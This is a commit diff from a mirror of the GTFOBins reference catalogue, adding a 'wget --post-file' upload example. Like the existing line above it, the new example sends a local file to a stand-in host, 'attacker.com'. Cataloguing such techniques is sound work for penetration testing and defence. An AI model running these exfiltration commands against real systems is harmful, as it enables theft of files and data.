mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-13 23:39:44 +01:00
Add wget --post-file
This commit is contained in:
parent
ad1f052edb
commit
1558400b06
@ -6,6 +6,9 @@ functions:
|
|||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
||||||
|
code: |
|
||||||
|
export URL=http://attacker.com/
|
||||||
|
wget --post-file="/path/file_to_send" $URL
|
||||||
download:
|
download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
|
Loading…
Reference in New Issue
Block a user